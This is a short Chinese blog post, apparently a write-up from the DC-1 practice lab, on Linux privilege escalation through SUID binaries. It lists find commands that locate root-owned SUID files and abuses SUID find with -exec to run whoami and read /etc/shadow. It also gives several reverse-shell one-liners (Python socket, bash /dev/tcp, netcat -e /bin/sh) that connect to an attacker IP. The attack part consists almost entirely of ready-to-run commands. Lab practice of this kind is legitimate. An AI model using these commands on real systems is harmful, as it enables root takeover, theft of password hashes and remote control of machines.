- A+
所属分类:漏洞复现
0x01 介绍
SUID可以让调用者以文件拥有者的身份运行该文件,所以我们利用SUID提权的思路就是运行root用户所拥有的SUID的文件,那么我们运行该文件的时候就得获得root用户的身份了。
0x02 命令
以下命令将尝试查找具有root权限的SUID的文件,不同系统适用于不同的命令
1 2 3 4 |
find / -perm -u=s -type f 2>/dev/null find / -user root -perm -4000 -print 2>/dev/null find / -perm -u=s -type f 2>/dev/null find / -user root -perm -4000-exec ls -ldb {} \; |
0x03 利用find文件提权
查看具有root用户权限的SUID文件
1 |
find / -perm -u=s -type f 2>/dev/null |
1 2 |
www-data@DC-1:/var/www$ touch user www-data@DC-1:/var/www$ find user -exec whoami \; |
1 |
www-data@DC-1:/var/www$ find user -exec cat /etc/shadow \; |
0x04 反弹shell
1 |
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.113",6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' |
1 |
bash -i >& /dev/tcp/192.168.1.113/6666 0>&1 |
1 |
netcat -lvp 5555 -e "/bin/sh" |
1 |
www-data@DC-1:/var/www$ find user -exec netcat 192.168.1.113 6666 -e "/bin/sh" \; |
- 我的微信
- 这是我的微信扫一扫
- 我的微信公众号
- 我的微信公众号扫一扫